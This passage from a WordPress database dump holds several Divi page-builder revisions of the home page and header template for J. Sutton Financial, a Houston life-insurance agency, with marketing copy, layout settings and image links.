Policy</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-11 21:29:54','2023-04-11 21:29:54','',138,'http://cmdev-site1.com/?p=905',0,'revision','',0),(779,3,'2023-04-04 12:59:16','2023-04-04 12:59:16','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" min_height=\"700px\" custom_margin=\"||9px|||\" custom_padding=\"23px||62px|||\" hover_transition_speed_curve=\"ease-out\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|auto||27px||\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_menu active_link_color=\"#FFFFFF\" dropdown_menu_line_color=\"#003372\" dropdown_menu_active_link_color=\"#003372\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" logo_width=\"20%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|desktop\" module_class=\"menu\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_font=\"||||||||\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" background_layout=\"dark\" module_alignment=\"left\" custom_margin=\"-43px|||0px|false|false\" custom_padding=\"|||0px|false|false\" global_colors_info=\"{}\" active_link_color__hover_enabled=\"on|hover\" active_link_color__hover=\"#003372\" menu_text_color__hover_enabled=\"on|hover\" menu_text_color__hover=\"#003372\" theme_builder_area=\"et_header_layout\" min_height=\"221.9px\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" hover_enabled=\"0\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\" sticky_enabled=\"0\" min_height=\"181px\"]<h1><span style=\"color: #ffffff;\">Planning for a <em>better</em> financial future </span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url,button_two_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section]','Default Website Template','','inherit','closed','closed','','528-revision-v1','','','2023-04-04 12:59:16','2023-04-04 12:59:16','',528,'http://cmdev-site1.com/?p=779',0,'revision','',0),(797,1,'2023-04-08 19:27:50','2023-04-08 19:27:50','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"18px||-35px|||\" custom_padding=\"0px|||||\" hover_enabled=\"0\" global_colors_info=\"{}\" background_color=\"rgba(158,153,153,0.1)\" sticky_enabled=\"0\" min_height=\"1552px\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" width=\"100%\" max_width=\"100%\" min_height=\"187.1px\" custom_margin=\"-3px|auto|-74px|auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Thumbs-Up-Icon-No-Background-Hex-666666.png\" title_text=\"Thumbs Up Icon No Background Hex 666666\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|37px||89px||\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" animation_direction=\"left\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" custom_margin=\"||10px|||\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"112px|||||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\"]<h2><strong>Want To Know How Much Insurance You Need?</strong></h2>[/et_pb_text][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][gravityform id=\"1\" title=\"false\" description=\"false\" ajax=\"true\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" custom_margin=\"66px|||||\" custom_padding=\"1px||0px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\">Join Our Team!</h2>\n<p>J. Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||0px||\" custom_padding=\"|||0px||\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"67px||141px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect typing_effect=\"Proudly headquartered in Houston, Texas!\" typing_cursor_color=\"#FFFFFF\" typing_background_color=\"RGBA(255,255,255,0)\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" typing_text_color=\"#FFFFFF\" custom_margin=\"54px|||||\" global_colors_info=\"{}\"][/dsm_typing_effect][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-08 19:27:50','2023-04-08 19:27:50','',138,'http://cmdev-site1.com/?p=797',0,'revision','',0),(796,1,'2023-04-08 19:22:52','2023-04-08 19:22:52','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"18px||-35px|||\" custom_padding=\"0px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" width=\"100%\" max_width=\"100%\" min_height=\"187.1px\" custom_margin=\"-3px|auto|-74px|auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Thumbs-Up-Icon-No-Background-Hex-666666.png\" title_text=\"Thumbs Up Icon No Background Hex 666666\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|37px||89px||\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" animation_direction=\"left\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" custom_margin=\"||10px|||\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"112px|||||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\"]<h2><strong>Want To Know How Much Insurance You Need?</strong></h2>[/et_pb_text][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][gravityform id=\"1\" title=\"false\" description=\"false\" ajax=\"true\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" custom_margin=\"66px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\">Join Our Team!</h2>\n<p>J. Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||0px||\" custom_padding=\"|||0px||\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"67px||141px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect typing_effect=\"Proudly headquartered in Houston, Texas!\" typing_cursor_color=\"#FFFFFF\" typing_background_color=\"RGBA(255,255,255,0)\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" typing_text_color=\"#FFFFFF\" custom_margin=\"54px|||||\" global_colors_info=\"{}\"][/dsm_typing_effect][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-08 19:22:52','2023-04-08 19:22:52','',138,'http://cmdev-site1.com/?p=796',0,'revision','',0),(795,1,'2023-04-08 19:21:37','2023-04-08 19:21:37','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Header-Full-Color-2200x1028-2.png\" min_height=\"700px\" custom_margin=\"||9px|||\" custom_padding=\"23px||62px|||\" hover_transition_speed_curve=\"ease-out\" hover_enabled=\"0\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\" title_text=\"Header Full Color 2200x1028\" sticky_enabled=\"0\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|auto||27px||\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_menu active_link_color=\"#FFFFFF\" dropdown_menu_line_color=\"#003372\" dropdown_menu_active_link_color=\"#003372\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" logo_width=\"20%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|desktop\" module_class=\"menu\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_font=\"||||||||\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" background_layout=\"dark\" module_alignment=\"left\" min_height=\"221.9px\" custom_margin=\"-43px|||0px|false|false\" custom_padding=\"|||0px|false|false\" global_colors_info=\"{}\" active_link_color__hover_enabled=\"on|hover\" active_link_color__hover=\"#003372\" menu_text_color__hover_enabled=\"on|hover\" menu_text_color__hover=\"#003372\" theme_builder_area=\"et_header_layout\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" min_height=\"181px\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"]<h1><span style=\"color: #ffffff;\">Planning for a <em>better</em> financial future </span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url,button_two_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section]','Default Website Template','','inherit','closed','closed','','528-revision-v1','','','2023-04-08 19:21:37','2023-04-08 19:21:37','',528,'http://cmdev-site1.com/?p=795',0,'revision','',0),(839,1,'2023-04-08 20:40:19','2023-04-08 20:40:19','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Header-Full-Color-2200x1028-2.png\" min_height=\"500px\" custom_margin=\"||-45px|||\" custom_padding=\"23px||30px|||\" hover_transition_speed_curve=\"ease-out\" hover_enabled=\"0\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\" parallax=\"on\" sticky_enabled=\"0\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|auto||27px||\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_menu active_link_color=\"#FFFFFF\" dropdown_menu_line_color=\"#003372\" dropdown_menu_active_link_color=\"#003372\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" logo_width=\"20%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|desktop\" module_class=\"menu\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_font=\"||||||||\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" background_layout=\"dark\" module_alignment=\"left\" min_height=\"221.9px\" custom_margin=\"-43px|||0px|false|false\" custom_padding=\"|||0px|false|false\" global_colors_info=\"{}\" active_link_color__hover_enabled=\"on|hover\" active_link_color__hover=\"#003372\" menu_text_color__hover_enabled=\"on|hover\" menu_text_color__hover=\"#003372\" theme_builder_area=\"et_header_layout\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" min_height=\"181px\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"]<h1><span style=\"color: #ffffff;\">Planning for a <em>better</em> financial future </span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url,button_two_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section]','Default Website Template','','inherit','closed','closed','','528-revision-v1','','','2023-04-08 20:40:19','2023-04-08 20:40:19','',528,'http://cmdev-site1.com/?p=839',0,'revision','',0),(798,1,'2023-04-08 19:28:20','2023-04-08 19:28:20','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Header-Full-Color-2200x1028-2.png\" min_height=\"700px\" custom_margin=\"||-19px|||\" custom_padding=\"23px||62px|||\" hover_transition_speed_curve=\"ease-out\" hover_enabled=\"0\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\" title_text=\"Header Full Color 2200x1028\" sticky_enabled=\"0\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|auto||27px||\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_menu active_link_color=\"#FFFFFF\" dropdown_menu_line_color=\"#003372\" dropdown_menu_active_link_color=\"#003372\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" logo_width=\"20%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|desktop\" module_class=\"menu\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_font=\"||||||||\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" background_layout=\"dark\" module_alignment=\"left\" min_height=\"221.9px\" custom_margin=\"-43px|||0px|false|false\" custom_padding=\"|||0px|false|false\" global_colors_info=\"{}\" active_link_color__hover_enabled=\"on|hover\" active_link_color__hover=\"#003372\" menu_text_color__hover_enabled=\"on|hover\" menu_text_color__hover=\"#003372\" theme_builder_area=\"et_header_layout\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" min_height=\"181px\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"]<h1><span style=\"color: #ffffff;\">Planning for a <em>better</em> financial future </span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" 